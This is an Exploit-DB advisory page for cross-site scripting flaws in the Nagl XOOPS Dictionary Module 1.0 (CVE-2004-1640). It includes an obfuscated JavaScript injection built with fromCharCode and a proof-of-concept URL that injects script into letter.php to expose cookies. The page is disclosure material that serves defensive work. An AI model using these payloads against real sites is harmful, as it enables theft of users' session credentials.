Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

24415

CVE:

2004-1640

EDB Verified:

Author:

CyruxNET

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2004-08-28

Vulnerable App: 
source: https://www.securityfocus.com/bid/11064/info

Reportedly the XOOPS Dictionary Module by Nagle is affected by multiple cross-site scripting vulnerabilities. This issue is due to a failure of the application to properly sanitize user-supplied URI input.

As a result of this issue and attacker can execute arbitrary script code in the browser of an unsuspecting user by enticing the unsuspecting user to follow a malicious link.

An attacker can leverage this issue to steal cookie based authentication credentials as well as carry out other attacks. It should be noted that the impact of this issue depends on the context of the dynamic web site developed with the XOOPS software and the XOOPS dictionary module and so cannot accurately be outlined here. 

script>
function xss (){
var tag=String.fromCharCode(60)+String.fromCharCode(105)+
String.fromCharCode(109)+String.fromCharCode(103)+String.fromCharCode(32)+
String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+
String.fromCharCode(32)+String.fromCharCode(61);
var web=String.fromCharCode(104)+String.fromCharCode(116)+
String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+
String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(119)+
String.fromCharCode(119)+String.fromCharCode(119)+String.fromCharCode(46)+
String.fromCharCode(103)+String.fromCharCode(111)+String.fromCharCode(111)+
String.fromCharCode(103)+String.fromCharCode(108)+String.fromCharCode(101)+
String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+
String.fromCharCode(109);
var path=String.fromCharCode(47)+String.fromCharCode(105)+
String.fromCharCode(109)+String.fromCharCode(97)+String.fromCharCode(103)+
String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(47)+
String.fromCharCode(103)+String.fromCharCode(111)+String.fromCharCode(111)+
String.fromCharCode(103)+String.fromCharCode(108)+String.fromCharCode(101)+
String.fromCharCode(95)+String.fromCharCode(56)+String.fromCharCode(48)+
String.fromCharCode(119)+String.fromCharCode(104)+String.fromCharCode(116)+
String.fromCharCode(46)+String.fromCharCode(103)+String.fromCharCode(105)+
String.fromCharCode(102)+String.fromCharCode(62);
document.write(tag+web+path);
} xss()
</script>

The following proof of concept has been provided for the 'letter.php' script issue:

ttp://attaker/modules/dictionary/letter.php?letter="><script>document.write(document.cookie)<script>(
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services